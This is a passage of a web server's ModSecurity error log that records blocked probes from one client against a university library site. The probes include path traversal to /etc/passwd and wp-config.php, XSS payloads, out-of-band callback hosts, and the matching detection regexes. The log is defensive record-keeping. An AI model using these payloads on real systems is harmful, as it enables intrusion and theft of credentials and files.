"digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TMCo-f0AAAmIbQQAAAAo"]
[Tue Aug 29 11:51:25.009606 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TcCo-f0AAAm-MdYAAAAI"]
[Tue Aug 29 11:51:26.786844 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15TsCo-f0AAAm-MdkAAAAI"]
[Tue Aug 29 11:51:26.887585 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/log"] [unique_id "ZO15TsCo-f0AAAm@5yIAAAAH"]
[Tue Aug 29 11:51:26.887654 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15TsCo-f0AAAmQ-xoAAAAb"]
[Tue Aug 29 11:51:27.034825 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15T8Co-f0AAAm80PUAAAAF"]
[Tue Aug 29 11:51:27.627969 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/login/"] [unique_id "ZO15T8Co-f0AAAnTlKkAAAAA"]
[Tue Aug 29 11:51:28.866385 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UMCo-f0AAAm@5ygAAAAH"]
[Tue Aug 29 11:51:28.869187 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UMCo-f0AAAmNp5MAAAAQ"]
[Tue Aug 29 11:51:28.899182 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UMCo-f0AAAnIlhMAAAAV"]
[Tue Aug 29 11:51:29.547341 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UcCo-f0AAAm7m-MAAAAE"]
[Tue Aug 29 11:51:30.571689 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:routineName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:routineName: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/jsps/genrequest.jsp"] [unique_id "ZO15UsCo-f0AAAm7m-YAAAAE"]
[Tue Aug 29 11:51:30.579754 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:usr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:usr: admin'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/login.php"] [unique_id "ZO15UsCo-f0AAAmQ-yMAAAAb"]
[Tue Aug 29 11:51:30.725229 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15UsCo-f0AAAnDFzkAAAAM"]
[Tue Aug 29 11:51:31.571622 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.pro\\x22><img src=x onerror=alert(document.domain)> found within TX:1: oast.pro\\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/cas/logout"] [unique_id "ZO15U8Co-f0AAAnGkJgAAAAR"]
[Tue Aug 29 11:51:31.572468 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15U8Co-f0AAAmQ-ycAAAAb"]
[Tue Aug 29 11:51:34.385694 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15VsCo-f0AAAmQ-zMAAAAb"]
[Tue Aug 29 11:51:34.697034 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15VsCo-f0AAAnd29gAAAAI"]
[Tue Aug 29 11:51:34.909050 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15VsCo-f0AAAmQ-z0AAAAb"]
[Tue Aug 29 11:51:34.909358 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15VsCo-f0AAAnf3kUAAAAM"]
[Tue Aug 29 11:51:35.001399 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15V8Co-f0AAAnf3kkAAAAM"]
[Tue Aug 29 11:51:35.535415 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnB5XgAAAAJ"]
[Tue Aug 29 11:51:39.533454 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15W8Co-f0AAAnd2-UAAAAI"]
[Tue Aug 29 11:51:40.898762 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XMCo-f0AAAnkwb0AAAAY"]
[Tue Aug 29 11:51:42.532990 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15XsCo-f0AAAnd3AQAAAAI"]
[Tue Aug 29 11:51:44.571108 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YMCo-f0AAAmIbR8AAAAo"]
[Tue Aug 29 11:51:45.586705 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YcCo-f0AAAfWOH8AAAAL"]
[Tue Aug 29 11:51:47.614255 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15Y8Co-f0AAAn0GWwAAAAa"]
[Tue Aug 29 11:51:48.648547 2023] [:error] [pid 2521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:src: <body onload=alert(1)>.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZMCo-f0AAAnZfFQAAAAG"]
[Tue Aug 29 11:51:48.693727 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZMCo-f0AAAnkwcEAAAAY"]
[Tue Aug 29 11:51:50.753209 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/error"] [unique_id "ZO15ZsCo-f0AAAn957sAAAAD"]
[Tue Aug 29 11:51:51.539717 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag 